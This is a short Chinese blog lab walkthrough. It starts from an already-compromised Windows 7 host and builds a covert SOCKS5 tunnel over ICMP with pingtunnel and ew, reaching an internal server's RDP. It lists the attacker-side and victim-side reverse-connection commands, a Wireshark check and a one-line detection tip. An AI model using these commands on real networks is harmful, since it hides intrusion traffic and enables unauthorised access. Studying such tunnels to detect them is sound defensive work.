Lluna's Pure land.

What is life like when singing to wine?

0%

ew+pingtunnel构建隧道

0x01.实验拓扑

0x02.实验目的

假设win 7已经被我们拿下,通过使用ew+pingtunnel构建socks5隧道,隐藏tcp流量,从而达到访问内网server 2021。

0x03.实验过程

01.kali执行

1
./pingtunnel -type server -nolog 1 -noprint 1 -key 6666

kali作为服务端等待连接

1
./ew_for_linux64 -s rcsocks -l 7777 -e 8888

将其他机器转发到kali 8888端口的流量转发至kali的7777端口

02.win 7执行

1
pingtunnel.exe -type client -l :4444 -s 192.168.1.9 -t 192.168.1.9:8888 -key 6666 -nolog 1 -noprint 1 -sock5 -1

开启socks5,将icmp隧道的流量使用本地4444端口进行转发

1
ew_for_win.exe -s rssocks -d 127.0.0.1 -e 4444

win 7使用4444端口进行转发

03.测试隧道是否构建成功

查看kali端,出现OK即大概率成功

使用代理访问server 2021

使用代理登入3389

04.wireshark抓包查看

可以看到只有icmp协议,证明流量全部封装到icmp隧道中。

05.icmp隧道的防范

一个正常的ping命令每秒最多发送两个数据包,而使用icmp隧道则再很短时间内产生上千个数据包。

-------------纸短情长下次再见-------------